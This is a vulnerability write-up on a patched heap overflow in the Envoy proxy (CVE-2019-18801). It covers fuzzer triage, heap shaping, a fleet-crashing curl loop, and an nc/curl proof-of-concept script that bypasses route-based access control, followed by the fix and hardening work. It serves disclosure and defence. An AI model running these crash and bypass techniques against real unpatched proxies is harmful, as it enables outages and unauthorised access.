Harvey Tuch

Exploiting an Envoy heap vulnerability

At Google, we have a commitment to enhancing the security and reliability of the Envoy proxy. We have dedicated initiatives around hardening, fuzzing, and responding to CVEs that are intended to increase our confidence in the trustworthiness of Envoy as a component in our infrastructure stack and those of our customers. In addition, we offer a Vulnerability Reward Program, open to all security researchers who can provide details on security vulnerabilities in Envoy.

Why do we care about making Envoy secure? In addition to being good stewards of OSS projects, we also use Envoy to provide cloud services, like Internal HTTP(S) Load Balancing. For such services, customers depend on Google to uncover and resolve security issues.

This article provides a deep dive into an Envoy vulnerability that was successfully detected and fixed by our Envoy Platform team. The focus is on a single heap vulnerability in Envoy’s HTTP/1 codec which, if exploited, would allow an attacker to bypass Envoy’s access control and routing logic.

Heap vulnerabilities are rare in Envoy as we use modern C++ features such as smart pointers, fuzz the data plane and have high test coverage (97%+ line coverage). We also make use of Clang’s Address Sanitizer, which runs in our CI and during fuzzing. However, even a single heap vulnerability can provide a potent attack vector. We consider one of the contributions of this article to be raising awareness of how heap vulnerabilities can be exploited on an L7 network proxy’s data plane, from first principles and with relatively little sophistication. This complements another recently published heap vulnerability in HAProxy’s HPACK implementation, CVE-2020-11100 from Google’s Project Zero.

The vulnerability we focus on below is CVE-2019-18801, which was fixed in the 1.12.2 Envoy security release in early December 2019. GCP’s Internal HTTP(S) Load Balancing product, which is based on Envoy, was patched prior to the embargo release date. Envoy-derived binaries, e.g. Istio, were patched in tandem with the release. We were alerted to a potential exploit while investigating a report from one of Envoy’s data plane fuzzers running on ClusterFuzz. It required about 2 days of work to turn into a viable proof-of-concept, which included time learning about tcmalloc internals, experimenting with heap exploit techniques (e.g. heap shaping, vptr manipulation, etc.), building out tooling and working through the story below.

It’s worth noting that the underlying heap overrun bug would have been fixed even if no exploit could have been demonstrated. Without the demonstration of exploitability, it would have been a correctness bug with potential security implications, and still worth fixing.

When talking about vulnerabilities, it’s helpful to be aware of the threat model. In this article, we adopt Envoy’s documented threat model and consider the case of an untrusted downstream client, under the control of an attacker, sending HTTP requests to an Envoy proxy.

A fuzzy beginning

Work on this exploit began when we were notified that ClusterFuzz had filed a new issue, https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18431. The fuzzer in question was codec_impl_fuzz_test, exercising Envoy’s HTTP/1 and HTTP/2 codecs.

Due to Envoy’s use of ASSERTs to state invariants related to buffer allocations, the potential for an overflow was given in the top-level fuzz report:

Crash Type: ASSERT
Crash Address:
Crash State:
bufferRemainingSize() >= length.
Envoy::Http::Http1::ConnectionImpl::copyToBuffer
Envoy::Http::Http1::RequestStreamEncoderImpl::encodeHeaders

By also examining the corpus provided by the fuzzer, it was evident that there was likely some interaction between the :method field and the Envoy::Http::Http1::ConnectionImpl::copyToBuffer() method in the HTTP/1 encoder.

headers {
  key: ":method"
  value: "GETactions {\n muta{\n ketruest_he key: ctions {\n ers {\n headers {\n key: ctions {\n new_streamTnrtasfTkey: ctioew: new_stream {asfer-e key: ctioew: r-e… and lots more like this… <several kilobytes long>"
}

Code inspection revealed that a memcpy was writing into a buffer whose size didn’t depend on the length of the :method header field value in the HTTP/1.1 encode path. The code likely assumed that only well-known method values would be used, such as GET, POST, HEAD, etc. However, RFC 7231 allows for arbitrary request methods, as described in https://tools.ietf.org/html/rfc7231#section-4.

From vulnerability to exploit

The fuzzer crash demonstrated that there was at least some implementation bug. The next step in understanding the vulnerability was to determine whether it was possible to send arbitrary method values on the wire as a remote attacker and have Envoy attempt to encode them as HTTP/1.

Initial conversations with Envoy founder (and data plane expert) Matt Klein revealed that it was unlikely that the HTTP/1 parser would allow arbitrary methods at the decode stage. A simple experimental environment, in which an Envoy binary was pointed at an example bootstrap YAML for proxying to google.com, demonstrated that this assessment was correct. Writing a request such as:

FooBar / HTTP/1.1
Host: foo

via netcat to the Envoy process and inspecting Envoy logs at trace level revealed that these non-standard methods are rejected immediately by http-parser:

[2019-10-31 00:36:49.162][84055][debug][http] [source/common/http/conn_manager_impl.cc:275] [C2] dispatch error: http/1.1 protocol error: HPE_INVALID_METHOD

However, Envoy can proxy requests from an HTTP/2 client to an HTTP/1 backend. It was less clear whether our HTTP/2 parser, built on nghttp2, would block arbitrary methods. In general, HTTP/2 encourages a more opaque treatment of header values and regularizes treatment of the request method via the :method pseudo-header. It was plausible that the HTTP/2 parser wouldn’t attempt to interpret the contents of this header.

To test this possibility, netcat was not very practical as a starting point, as we would need the ability to craft custom binary frames to send as an HTTP/2 request. curl provides the ability to add arbitrary request methods, so a probe request could be sent with:

curl --http2-prior-knowledge --request FooBar localhost:10000

This was successfully proxied through Envoy to the backend, so it seemed possible to exercise the code in question. The next probe was:

curl --http2-prior-knowledge --request "AAAAAA… around 4200 As AA" localhost:10000

When this request was applied to a debug Envoy build with ASSERTs enabled, the same crash that was reported by the fuzzer was observed. This was encouraging; now it was clear that a remote attacker with just curl could target any Envoy configured for downstream HTTP/2 and upstream HTTP/1, a fairly standard data plane forwarding behavior. It was clear at this point that the vulnerability might have wide scope and impact.

Query-of-death

An obvious attack from this kind of heap corruption is a query-of-death (QoD). This is the simplest heap exploit to consider, but if it was easily repeatable, it would mean that a remote attacker could bring down an entire edge fleet of Envoys with only 1 query per Envoy. This would lead to a highly asymmetric DoS attack.

After some experimentation, a QoD sequence that typically creates a crash within a few seconds was derived using just curl and some bash:

while true
do
  curl -m $(( (RANDOM % 5) + 1 )) \
    --http2-prior-knowledge --request "AAAA… around 48kb As" \
    localhost:10000 -d "foo" &
  sleep 1
done

What’s going on here? Multiple curl requests are being sent. Each is overflowing a buffer. In this example we used a simple Python backend test server to sink the traffic:

python -m SimpleHTTPServer 1050

We use randomized delays for timeout to generate heap churn. This avoided falling into degenerate deterministic heap allocations, where we kept corrupting the same buffer that was never reused. The above example reproduces within a few requests and would have likely worked against a production service.

Data plane manipulation

Crashing an Envoy fleet via a QoD spray is a good start, but we can potentially do more with a heap overflow vulnerability such as this, by taking advantage of HTTP proxy specifics. Potential exploits include:

  • Corrupting other in-flight requests, for example rewriting contents or headers of some other user’s request.
  • Corrupting source/length of memory copies or buffers to read out arbitrary memory contents, leaking high value data such as crypto keys. By having contents copied into requests an attacker controls, a means of exfiltration on the wire may exist.
  • Remote code execution (RCE), where complete remote ownership of the process takes place.

The most devastating remote attack is a reliable RCE or a memory read out. RCEs are somewhat trickier on the heap in comparison to the stack. This is because the heap is typically used for data accesses rather than control flow. However, in C++ we have the potential to corrupt vtable pointers, as well as regular function pointers.

RCEs are typically mitigated by ASLR. We started to explore by examining the text segment in /proc/<pid>/smaps, to establish whether ASLR was enabled for Envoy:

00400000-017ee000 r-xp 00000000 fe:01 17961168 /usr/local/.../bazel-out/k8-opt/bin/source/exe/envoy-static

This didn’t look very random; in fact it’s the link address. OSS Envoy was missing the -fPIE compile option and the Linux kernel can only do ASLR for a position independent executable. This was an oversight and was fixed in https://github.com/envoyproxy/envoy/pull/8792.
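
A check like this is easy to script. The sketch below is illustrative only: the function name is hypothetical, and it assumes that 0x400000 is the conventional link address of a non-PIE x86-64 executable, which is consistent with the mapping shown above.

```python
def text_mapping_start(smaps_line: str) -> int:
    """Return the start address of a /proc/<pid>/smaps mapping line."""
    address_range = smaps_line.split()[0]        # e.g. "00400000-017ee000"
    start_hex, _end_hex = address_range.split("-")
    return int(start_hex, 16)

# Assumption: non-PIE x86-64 binaries are conventionally linked at 0x400000.
NON_PIE_LINK_BASE = 0x400000

line = ("00400000-017ee000 r-xp 00000000 fe:01 17961168 "
        "/usr/local/.../bazel-out/k8-opt/bin/source/exe/envoy-static")
looks_non_pie = text_mapping_start(line) == NON_PIE_LINK_BASE
print("text segment at link address:", looks_non_pie)
```

With a position independent executable and ASLR enabled, the start address would be expected to differ from run to run rather than sit at the link address.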

A key property of any exploit is that it needs to be repeatable, not just a one in a billion possibility. To create a reliable exploit, we don’t want to rely on arbitrary memory contents being overwritten, as we don’t know what the heap looks like in general. Instead, we want the heap to be primed so that when a buffer overflow is triggered, there will be something located at the overflow location that is highly likely to result in an exploit possibility. The idea of priming the heap in this way is generally known as heap shaping (aka heap grooming, heap feng shui, see related heap spraying).

To understand how it’s possible to shape the heap in the Envoy case, a useful starting place is the memory allocator. In Envoy, this is tcmalloc, selected for its performance and profiling capabilities. A key insight that enables simple heap shaping is tcmalloc’s small object allocation algorithm. A number of heap allocation classes exist, grouping allocations into similar size classes. If two allocations of X bytes and ≈X bytes occur, they are likely to land in the same size class. On the hot path, each thread maintains its own free list for each size class. When depleted, the thread asks a global (central) allocator for more objects in this class. When the central allocator is depleted, it requests large contiguous page allocations (referred to as slabs) that are then broken up into the objects of the size class. The free list operates LIFO, so on a quiescent system, there is an opportunity to use these facts to arrange the free list and data allocations to create an exploit opportunity.

The first trick is to ensure that all objects, both the encoding buffer for the overflow and the target for the overflow, come from the same size class. This provides the possibility that they will be coresident on the same slab of pages allocated by the central allocator. The encoding buffer is sized at 4kb + path length and comes from a reservation from Envoy’s Buffer::OwnedImpl. Ultimately, these reservations are backed by Buffer::OwnedSlice and allocated via a custom new. These heap allocations are rounded up to the next page size, so will be 8kb. As a result, we needed the target buffer for the attack to also be 8kb.
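
The sizes involved can be sketched with some simple arithmetic. This is a toy model rather than Envoy’s actual accounting: it assumes the reservation is exactly 4096 bytes plus the path length, considers only the request line, and ignores any per-slice header. All function names are hypothetical.

```python
RESERVATION_BASE = 4096   # the "4kb" term from the text
ALLOCATION_SIZE = 8192    # reservation rounded up to 8kb, per the text

def reserved_bytes(path: bytes) -> int:
    # The reservation tracks the path length but not the method length.
    return RESERVATION_BASE + len(path)

def request_line_bytes(method: bytes, path: bytes) -> int:
    # "<method> <path> HTTP/1.1\r\n"
    return len(method) + len(b" ") + len(path) + len(b" HTTP/1.1\r\n")

def reservation_overrun(method: bytes, path: bytes) -> int:
    """Bytes the request line alone writes past the reservation."""
    return max(0, request_line_bytes(method, path) - reserved_bytes(path))

def spills_past_allocation(method: bytes, path: bytes) -> bool:
    """True if the request line alone is longer than the 8kb allocation."""
    return request_line_bytes(method, path) > ALLOCATION_SIZE

for size in (3, 4200, 8192):
    method = b"A" * size
    print(size, reservation_overrun(method, b"/"), spills_past_allocation(method, b"/"))
```

In this model, a method of around 4200 bytes already exceeds the reservation, while a method of roughly 8kb is needed before the write leaves the 8kb allocation and reaches whatever follows it.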

How could we create a target buffer of 8kb? There are a few ways to do this:

  1. Have multiple requests, each with allocations that are ≈8kb. We knew we could get this for free in the request encode buffer. By adjusting both start and completion times of requests, it would be possible to shape the ordering of the tcmalloc free lists.
  2. Sending large bodies in the request that are ≈8kb.
  3. We also had prior knowledge that Envoy’s HeaderMapImpl would malloc buffers to fit request header values, so using large headers could also force such allocations.

The next part of the attack was to have the encode buffer precede the target buffer and be within a range that header byte size limits would allow (64kb). To understand memory layout, we sent multiple large requests (with techniques 1–3) populated with ASCII A (0x41) in the method header and ASCII B (0x42) in the data payload, set a breakpoint on the firing ASSERT and inspected memory contents under gdb. This was a form of dye tracing. In addition, we inserted log messages at various sites to track likely large allocations of interest. Visually, it’s easy to page through memory around the target with a command such as:

(gdb) x /5000xw 0x26f0000

And see output like:

0x26f0000: 0x0138b490 0x00000000 0x026f0028 0x00000000
0x26f0010: 0x00000000 0x00000000 0x00000000 0x00000000
0x26f0020: 0x00001fd8 0x00000000 0x41414141 0x41414141
0x26f0030: 0x41414141 0x41414141 0x41414141 0x41414141
0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000
0x2701010: 0x00000000 0x00000000 0x00000000 0x00000000
0x2701020: 0x00001fd8 0x00000000 0x42424242 0x42424242
0x2701030: 0x42424242 0x42424242 0x42424242 0x42424242
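
To make the layout easier to read, the first rows of the dump can be reinterpreted as 64-bit little-endian fields. The sketch below uses only the words shown above. Reading the third non-zero field (0x1fd8) as the payload capacity of the slice is our assumption; the dump itself only shows the value.

```python
import struct

# First three rows at 0x26f0000, as 32-bit words from the gdb output.
words = [
    0x0138b490, 0x00000000, 0x026f0028, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00001fd8, 0x00000000, 0x41414141, 0x41414141,
]
raw = struct.pack("<12I", *words)        # x86-64 stores words little-endian
fields = struct.unpack("<6Q", raw)       # reinterpret as six 64-bit values

base = 0x26f0000
vptr = fields[0]                         # C++ vptr of the slice object
data_ptr = fields[1]                     # pointer to the start of the payload
size_field = fields[4]                   # assumed: payload capacity in bytes
first_payload = fields[5].to_bytes(8, "little")

header_bytes = data_ptr - base
print(hex(vptr), hex(header_bytes), size_field, first_payload)
print("header + payload =", header_bytes + size_field)
```

The payload pointer lands 0x28 bytes after the start of the object, and 0x28 + 0x1fd8 = 0x2000, which is consistent with an 8kb allocation holding a small header followed by the dye bytes.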

After some fiddling around with ordering, multiplicity and timing, we got lucky. Envoy happened to allocate the header encoding buffer immediately before the slice related to the data payload. This luck was helpful but not necessary; we describe more explicit heap shaping below.

Now that we had a target Buffer::OwnedSlice, tweaking the method header size slightly to force it to overrun the buffer was possible via some iteration. The key to causing a crash here was to consider what the initial bytes of the target buffer look like:

0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000

There were some interesting targets here that were likely to cause segfaults if corrupted. The first was the C++ object vptr, 0x0138b490. Writing 0x42424242 over this would crash the process on the next virtual call through the object. The next was 0x02701028, which, due to a detail of the buffer implementation, provides an indirection to the real buffer contents. Corrupting it would also cause a crash on a later access.

So, we had another repeatable crash vector. The next step was to consider what would happen if we rewrote the vptr in a more deliberate way. This would allow us to change later code execution. What if we rewrote the buffer base to point it at some arbitrary memory location we wanted to read? We might be able to copy into our request ranges of Envoy process memory.

We tweaked the overflow to include changes to pointer locations, using \x escaping in the curl strings. Unfortunately, Envoy started to reject the HTTP/2 client requests prior to them being able to reach the HTTP/1 encoder. This was because header values are limited to printable ASCII characters, as per RFC constraints on valid header values (https://tools.ietf.org/html/rfc7230#section-3.2.6). nghttp2 enforces this property.
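
A small sketch shows why this restriction is fatal for pointer rewriting. The check below is a simplified stand-in for the codec’s validation, assuming the rule is "printable ASCII only" as described above; it is not nghttp2’s actual logic, and the function name is hypothetical.

```python
import struct

def is_printable_ascii(value: bytes) -> bool:
    # Simplified stand-in for header value validation (assumption).
    return all(0x20 <= byte <= 0x7E for byte in value)

vptr = 0x0138b490                          # vptr value seen in the gdb dump
pointer_bytes = struct.pack("<Q", vptr)    # 64-bit little-endian, as stored in memory

print(pointer_bytes.hex(), is_printable_ascii(pointer_bytes))
print(is_printable_ascii(b"A" * 8))        # dye bytes pass the same check
```

Any realistic 64-bit user-space pointer contains zero bytes in its upper half, so it cannot be expressed in a value that must consist of printable characters.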

This limitation significantly reduced the potential for the exploit as developed so far; it was not possible to rewrite pointers in a meaningful way. Back to the drawing board.

Targeting plain memory allocations

Envoy performs both C++ object allocations on the heap via new and also regular plain mallocs. Plain mallocs don’t have the problem of vptr corruption. Large header values are allocated in dedicated malloc buffers in Envoy. What if it was possible to manipulate the contents of an in-flight header string to achieve some interesting outcome?

We knew from a previous CVE that being able to have the interpretation of the :path header by the backend be different to that used when Envoy performs its authorization checks (ext_authz, RBAC, route table lookup) is useful. It can provide bypass of Envoy’s authorization and access control capabilities, for example. So, we looked at what could be done to the path header. After some experimentation, the following seemed likely to work:

  1. Remote attacker shapes the heap with some preliminary requests.
  2. Remote attacker sends request A with the path set to //////////..about 8kb of /…/////. The advantage of this pattern is that it is often collapsed to / by backends.
  3. Envoy performs ext_authz, RBAC, routing on request A and then buffers request A. We assume the use of the buffer filter, which is not uncommon.
  4. Remote attacker sends request B with the method header overflow. The encoding buffer for B must precede the path header malloc for A, as a result of the shaping in (1).
  5. Request B modifies the path in A to point to /some_secret_treasure. The remote attacker now bypasses Envoy’s access controls and gains access via request A to protected backend services (the secret treasure).

A more sophisticated attacker might at this point have turned their attention to the tcmalloc heap data structures, or maybe looked for other raw malloc buffers that could be manipulated for RCE or leaking out crypto keys. This requires some time and creativity, and we already had a likely attack vector, so we moved on to making this exploit reliably reproducible. The key was to manage step (1) above.

Shaping the heap

For any non-crash exploit, we also ideally want the target buffer to still be active after the overflow request encoding occurs. This requires that we pay attention to the timing of requests and be able to have some ability to influence this; at this point curl alone is not the right tool.

There are dedicated packet and request manipulation tools, for example scapy. However, we had some HTTP/2 header encoding utilities from previous CVEs and fuzzers in Envoy, so we opted to use these as the basis for the attacks. We wrote a short utility based on these libraries to generate a file, preamble-and-headers.bin, providing a connection prefix consisting of:

  • HTTP/2 client connection preface
  • Default SETTINGS frame
  • Initial WINDOW_UPDATE frame

together with a candidate HEADERS frame with the 8kb ///////.. path. A second file, data-eos.bin, had a DATA frame with EOS set. Using this pattern, netcat could be used to send, hold and finish a request stream, e.g.:

(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
nc -N localhost 10000
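
For readers without access to such utilities, the two files can be approximated with a few lines of standard-library Python. This is a minimal sketch, not the tool we used: it hand-encodes frames per the HTTP/2 frame layout and uses HPACK literal header fields without indexing or Huffman coding. The :authority value, the 4-byte body and the window increment are arbitrary illustrative choices, and the header block is assumed to fit in a single HEADERS frame.

```python
import struct

CONNECTION_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
DATA, HEADERS, SETTINGS, WINDOW_UPDATE = 0x0, 0x1, 0x4, 0x8
END_STREAM, END_HEADERS = 0x1, 0x4

def frame(frame_type: int, flags: int, stream_id: int, payload: bytes = b"") -> bytes:
    """9-byte frame header (24-bit length, type, flags, stream id) plus payload."""
    header = struct.pack(">I", len(payload))[1:] + bytes([frame_type, flags])
    return header + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload

def hpack_int(value: int, prefix_bits: int) -> bytes:
    """HPACK prefixed integer representation."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([value])
    out = [limit]
    value -= limit
    while value >= 128:
        out.append((value % 128) | 0x80)
        value //= 128
    out.append(value)
    return bytes(out)

def hpack_string(data: bytes) -> bytes:
    # Huffman bit clear: the string is sent as raw octets.
    return hpack_int(len(data), 7) + data

def literal_header(name: bytes, value: bytes) -> bytes:
    # 0x00 selects "literal header field without indexing, new name".
    return b"\x00" + hpack_string(name) + hpack_string(value)

def preamble_and_headers(path: bytes, stream_id: int = 1) -> bytes:
    block = b"".join(literal_header(n, v) for n, v in [
        (b":method", b"GET"), (b":scheme", b"http"),
        (b":authority", b"host"), (b":path", path)])
    return (CONNECTION_PREFACE
            + frame(SETTINGS, 0, 0)                                  # default SETTINGS
            + frame(WINDOW_UPDATE, 0, 0, struct.pack(">I", 65535))   # arbitrary increment
            + frame(HEADERS, END_HEADERS, stream_id, block))         # stream stays open

def data_eos(body: bytes = b"body", stream_id: int = 1) -> bytes:
    return frame(DATA, END_STREAM, stream_id, body)

if __name__ == "__main__":
    print(len(preamble_and_headers(b"/" * 8192)), len(data_eos()))
```

Writing the two return values to preamble-and-headers.bin and data-eos.bin gives inputs of the shape used in the netcat pipeline above. The HEADERS frame deliberately omits END_STREAM so that the request is held open until the DATA frame arrives.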

If we imagine the tcmalloc thread local cache slab for 8kb in question to look like H₀H₁H₂ and the free list to be [H₀, H₁, H₂] initially, we want to arrange something like:

  • H₀ = request encode buffer for overflow request B.
  • H₁ = malloc allocation for 8kb ///////.. path in target request A.

To shape the heap, we can send an initial shaping request with an 8kb path header, call this request S, and hold it. At this point, the free list looks like [H₁, H₂].

We then send request A and hold it. The free list looks like [H₂] and we have H₀ containing request S’s path header and H₁ containing request A’s path header.

We now send “end stream” for request S, resulting in a free list of [H₀, H₂].

We then send request B, which will have its request header allocated at H₀, immediately below request A’s path header. This is deterministic on a quiescent Envoy. It’s necessary to set --concurrency 1 to increase the odds of it working reliably. More sophisticated shaping could probably make this work with higher probability on loaded or multi-worker servers.
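
The sequence above can be replayed against a toy model of a single size class. This sketch assumes nothing about tcmalloc beyond the LIFO free list behavior described earlier; the class and variable names are hypothetical, and slot i stands for Hᵢ on a contiguous slab.

```python
class ToyThreadCache:
    """Toy LIFO free list for one size class."""

    def __init__(self, slots: int):
        self.free = list(range(slots))   # index 0 is the head of the free list

    def alloc(self) -> int:
        return self.free.pop(0)          # allocations take the head

    def release(self, slot: int) -> None:
        self.free.insert(0, slot)        # freed slots return to the head (LIFO)

cache = ToyThreadCache(3)                # free list: [H0, H1, H2]
history = []

s_path = cache.alloc()                   # request S path header lands in H0
history.append(list(cache.free))
a_path = cache.alloc()                   # request A path header lands in H1
history.append(list(cache.free))
cache.release(s_path)                    # end stream for S frees H0
history.append(list(cache.free))
b_encode = cache.alloc()                 # request B encode buffer reuses H0

print(history, "B at H%d, A at H%d" % (b_encode, a_path))
```

The recorded free lists match the states listed above, and request B’s buffer ends up in the slot directly before request A’s path header.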

At this point, we have the techniques to deterministically overwrite the path of one request with contents in the method header of another request. The next step was to generate a proof-of-concept. We configured Envoy with the following HCM bootstrap:

- name: envoy.http_connection_manager
  typed_config:
    "@type": type.googleapis.com/envoy.config.filter.network.http_connection_manager.v2.HttpConnectionManager
    codec_type: HTTP2
    stat_prefix: ingress_http
    route_config:
      name: local_route
      virtual_hosts:
      - name: local_service
        domains: ["*"]
        routes:
        - match:
            prefix: "/treasure"
            headers:
            - name: ":method"
              exact_match: "GET"
          direct_response:
            status: 503
        - match:
            prefix: "/"
          route:
            cluster: service_google
    http_filters:
    - name: envoy.buffer
      config:
        max_request_bytes: 128000
    - name: envoy.router

The /treasure path was supposed to be sinkholed. The use of GET header matching here is due to a technicality that becomes apparent when we expand what the backend sees below.
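
The effect of these two routes can be sketched as a first-match lookup. This is a simplified model of the route table above, not Envoy’s router: it handles only prefix matching and an optional exact :method match, and the names are hypothetical.

```python
ROUTES = [
    # (path prefix, required exact :method or None, action)
    ("/treasure", "GET", "direct_response 503"),
    ("/", None, "cluster service_google"),
]

def select_route(method: str, path: str) -> str:
    """Return the action of the first route whose matchers all succeed."""
    for prefix, required_method, action in ROUTES:
        if not path.startswith(prefix):
            continue
        if required_method is not None and method != required_method:
            continue
        return action
    return "no route"

print(select_route("GET", "/treasure"))          # sinkholed
print(select_route("A" * 8000, "/treasure"))     # oversized method is forwarded
print(select_route("GET", "/" * 8192))           # long slash path is forwarded
```

A plain GET for /treasure is answered locally, while a request for /treasure carrying any other method falls through to the catch-all route and is forwarded upstream.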

The attack script was then:

# Request S
(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
  nc -N localhost 10000 &
sleep 0.5
# Request A
(cat preamble-and-headers.bin; sleep 10; cat data-eos.bin) | \
  nc localhost 10000 > result_containing_the_secret_treasure &
sleep 3
# Request B
curl --http2-prior-knowledge \
  --request "AA.. about 8kb of A.. AA" \
  localhost:10000/treasure -d "foo"

This roughly follows the logic described above, but there is one trick: the request for treasure is in the path, not the method overflow. Why?

When we first attempted to overflow the buffer, and placed /treasure in the method header overflow, a strange request was delivered:

GET /treasure / HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 79a313a6-996d-4266-bf8f-646205d24ac9
x-envoy-expected-rq-timeout-ms: 15000
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////...///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: be710b85-8c80-46be-92cb-895191299638
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

There are two path specifiers in the first line of the request (illegal) and what looks to be two nested requests. Envoy’s HTTP/1 request encoder appended the buffer in request B, overflowed into request A, but then also continued to finalize the headers for request B inside request A’s path header value. We needed a slightly different strategy to make the exploit work given this behavior:

curl --http2-prior-knowledge \
  --request "AA.. about 8kb of A.. AA" \
  localhost:10000/treasure -d "foo"

We tweaked the overflow bytes in request B to position request B’s encoder such that once it had written its method inside its own buffer, the remainder of request B, starting with the /treasure path, became the new path for request A. Because of the line breaks now embedded in request A’s path, request A’s own header encoding ended up being treated as request A’s HTTP body. The backend then observed:

GET /treasure HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 95028bfb-7890-4f6a-a96f-1b43a48716c6
x-envoy-expected-rq-timeout-ms: 15000
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////...///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: 04964d4c-19a7-41bb-8a90-d2dedbe9755b
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000
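
The mechanics of this overwrite can be reproduced in a toy flat-memory model. The sketch below is an illustration under strong simplifying assumptions: two adjacent 8kb slots with no slice headers or allocator metadata, a hypothetical encoder that emits only a request line and a couple of headers, and an unchecked copy standing in for the vulnerable memcpy.

```python
SLOT = 8192                                   # toy slot size for both allocations

heap = bytearray(2 * SLOT)                    # H0 followed directly by H1
heap[SLOT:] = b"/" * SLOT                     # H1: request A's held path value

def encode_request(method: bytes, path: bytes, headers) -> bytes:
    """Hypothetical HTTP/1 encoder: request line, headers, blank line."""
    out = method + b" " + path + b" HTTP/1.1\r\n"
    for name, value in headers:
        out += name + b": " + value + b"\r\n"
    return out + b"\r\n"

# Request B: the method plus the following space exactly fills H0,
# so B's path is the first thing written into H1.
b_wire = encode_request(b"A" * (SLOT - 1), b"/treasure",
                        [(b"host", b"localhost:10000"), (b"content-length", b"3")])
heap[0:len(b_wire)] = b_wire                  # unchecked copy past the end of H0

# Request A is encoded afterwards from its (now corrupted) path value.
a_wire = encode_request(b"GET", bytes(heap[SLOT:]), [(b"host", b"host")])
first_line = a_wire.split(b"\r\n", 1)[0]
head, body = a_wire.split(b"\r\n\r\n", 1)

print(first_line)
print(body[:16])
```

In this model the backend’s view of request A starts with a request line for /treasure followed by request B’s headers, and the remaining slashes plus request A’s original headers fall after the blank line, mirroring the capture above.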

We constructed a simple backend Flask Python server to be able to control timing and return the treasure. After running the above script, result_containing_the_secret_treasure has the desired treasure returned to the attacker.

Practical implications

At this point, given the careful timing and configuration choice, it’s reasonable to question the practical application of this exploit. Here we enumerate and examine some assumptions and considerations:

  • An HTTP/2 → HTTP/1 request path is a reasonably common Envoy data plane forwarding path.
  • The buffer filter is one of Envoy’s core filters that features in many configurations.
  • Assuming a quiescent server is a little more restrictive. However, regional servers and proxies may be quiescent at night. Also, it’s only necessary to access the hidden treasure once to have a successful attack. More sophisticated heap shaping would reduce the need for this restriction. Timing requirements may also depend on the nature of the shaping; in our example they were fairly generous and easy to implement with the sleep command at second granularity.
  • Envoy was run with --concurrency 1 to have all the requests land on the same worker thread. The attack may still work with other concurrency settings with some lower probability.
  • The GET header matching was needed due to the use of /treasure in request B. We needed to avoid the rejection of request B prior to forwarding and invoking the HTTP/1 encoder. This configuration choice is unusual, but there are other highly plausible scenarios in which we wouldn’t need to do this. For example, if there were two listeners with different route configurations, where one sinkholed /treasure and the other didn’t, the GET header matching would not be required.
  • After the attack, the Envoy process had a corrupted memory allocator state. We couldn’t access the treasure again on a second replay with the same server. This increased the likelihood of detection (e.g. via core dump and analysis) and reduced the likelihood of the attack working on a noisier server.

This attack was built from first principles and ignores a large body of work and tooling around RCE and heap attacks, since our focus was on the HTTP data plane specific aspects. It’s entirely possible that more sophisticated heap exploits for the same vulnerability, with fewer constraints and assumptions, could be developed by security researchers who specialize in these kinds of attacks. The QoD attack and cross-request interference were also potentially impactful, regardless of either RCE or access control bypass.

For the purposes of Envoy security, we were convinced by the proof-of-concept that we had a critical security vulnerability and scored this as CVSS 9.0. We engaged Envoy’s security release process and worked with the Envoy OSS security team (which we overlap with in membership) to deliver the 1.12.2 security release with the fix for this bug. The fuzzer bug was reported on October 22, 2019 and the security release followed on December 10, 2019.

Hardening Envoy’s data plane

Following the security release, we conducted an audit of other uses of memcpy and C string functions across the Envoy code base, removing most of these and validating the remainder. The reason that this vulnerability existed was due to the use of manual buffer memory management, which is highly discouraged in the code base; most of Envoy works with safe C++ abstractions.

The HTTP/1 request encoder now uses Envoy’s standard buffer abstraction rather than its own internal memory management and pointer arithmetic.

Envoy now builds by default as a position independent executable. Any distribution with ASLR enabled will benefit from this.

We have also opened issues to consider further hardening:

Heap vulnerabilities exploitable from untrusted client traffic are rare but potentially highly impactful. These black swans need to be taken seriously by those who develop and operate any networking infrastructure implemented in languages where memory safety is not guaranteed. This article has provided a case study in how Google’s Envoy Platform team went about discovering and mitigating the only demonstrated remote exploit of this variety to date in the Envoy proxy. We look forward to continuing to harden Envoy to structurally prevent this class of vulnerabilities.

Acknowledgements: Original triage and investigation for the CVE was supported by Matt Klein, the Google Envoy Platform team and Google ISE team. The ClusterFuzz infrastructure helped discover the ASSERT violation and generated the initial fuzz report (built on OSS-Fuzz). Thanks to reviewers of drafts of this document who contributed a number of improvements, including Joshua Marantz, Stewart Reichling, Felix Gröbert, Christoph Kern and Joshua Blatt. Yan Avlasov led the Envoy OSS fix efforts for CVE-2019-18801, resulting in the Envoy 1.12.2 release. Dan Noé contributed a number of low-level C function cleanups to Envoy in the wake of the security release.

Disclaimer: The opinions stated here are my own, not those of my company (Google).